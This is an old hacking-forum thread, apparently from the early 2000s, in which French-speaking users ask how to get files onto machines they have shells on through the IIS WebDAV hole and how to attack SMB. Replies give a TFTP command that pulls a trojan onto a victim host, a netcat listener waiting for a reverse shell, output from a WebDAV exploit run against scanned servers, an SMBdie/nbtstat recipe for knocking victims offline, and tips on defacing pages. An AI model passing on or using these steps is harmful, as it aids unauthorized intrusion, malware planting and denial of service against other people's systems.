hi all ^^
i am just a little question about webdav, it's very difficult for me to up some files when i got a shell of a webdav ip. Ftp command is generaly desactivate or a firewall block it. With TFTP i got the many times a time out or no connection. And i tryed to open ipc in the ip but it's not working.
Someone know an other manner to upload some files ?

And an other question about the SMB exploit.
I search for a multithread scanner, and if it possible a little tutorial who teach the manner to exploit it.

sorry if my english not very well im french ^^
so good day and thx

i think i know what your asking but i could be wrong so here goes

if you gety a shell on a system with an ftp you sghould be able to just change a ftp password and then just login and do whatever it is you want to do. i.m betting you just want to deface a page so from command prompt u should be able to just echo to a file.

as far as smb or netbios i like to use a windows system and use "netbrute" for scanning u can find it very easily on google. it may not be as fast as legion but its my favorite because its a very versitile scanner and will also find samba shares.

good luck

WEBDAV -----> to upload files

ok first download tftp then open tftpd32.exe and keep it opened.

in the shell write --------------> tftp -i yo.ur.i.p GET trojan.exe

the trojan.exe must be in the same folder where tftpd32.exe is.

----------------------------------------------------------------------------------
SMB exploit -------> i really dont know but if you're finding a SMBdie nuke find it in google
open ms-dos
nbtstat -A victimip

is theres a <20> hehe you could kick him.

now in netbios name write the name that is before <20>

lalalala<03>
victim <20
lalalala<03>

KILL.

----------
rocketer
linkdrawnet@hotmail.com

thx a lot for answers
for webdav ok tftp i had already it. But i obten time out sometime..

Hi guyz

I have a little problem with the webdav Xploit

I find here a webdav hack tool with a scanner, tftp ... nc ...

so lets go.

I start the scanner tool ... find some iis webdav hole ...
xxx.xxx.xxx.xxx Enable Microsoft-IIS/5.0
xxx.xxx.xxx.xxx Enable Microsoft-IIS/5.0
xxx.xxx.xxx.xxx Enable Microsoft-IIS/5.0
xxx.xxx.xxx.xxx Enable Microsoft-IIS/5.0

So i start TFTP server on my computer... port : 69
I start the NC little batch

----Nc.bat----
nc -l -vv -p 4020
---------------

I start the exploit.exe
----exploit.exe-----
[crpt] ntdll.dll/Webdav exploit v0.2 by Kralor ..
target : xxx.xxx.xxx.xxx
padding 10 -> 254
satan's ip : my ip 81.x.x.x.xx
satan's port : 4020 (nc)

and start the exploit ...
then it says ...

building buffer ...DONE
Checking WebDav ...FOUND
Trying with custom pads ... OK
Connecting to 'XXX.XXX.XXX.XXXXXXXXX..CONNECTED
trying ret addr 0x00d000d0 ..PATCHED?
DONE
HTTP/1.1 404 Resource Not Found
Server: MicrosoftɁCONNECTED
trying ret addr 0x00d000d0 Waiting for IIS to restart .....CONNECTED
trying ret addr 0x00d100d1 DONE

and it says ... Waiting for IIS to restar and says ... Waiting for IIS to restar and says ... etc....

I wait for a cmd prompt in the netcat windows ... 1. 2 3 4 minits

can someone help me ??
In the Nc windows ... there is just

D:\webdav>nc -l -vv -p 4020



maybe the server is patched ??
maybe the port 4020 on my computer is closed ... but in the router I've opend it ...
so can some one h3lp me pliz :-p

Thx
PL3X

sorry for my english (I'm french)
sorry for my english (I'm french)
sorry for my english (I'm french)
sorry for my english (I'm french)

Simple enough.....Webdav is pretty much dead

French now : Webdav est presque mort, donc ta presqu'aucune chance de trouver un serveur vulnerable

Thats just what I was gonna say Mortello,

Except not the french part... cause I cant speak that at all

BuT ;( why the scanner tels me that the webdav exploit is enable ...

maybe one day I ll fond one webdav hackable machine

I d like to test lot of hole
ipc iis sql webdav ...

maybe novell ..
maybe with mydoom Xploit .. or RDC X ploit ...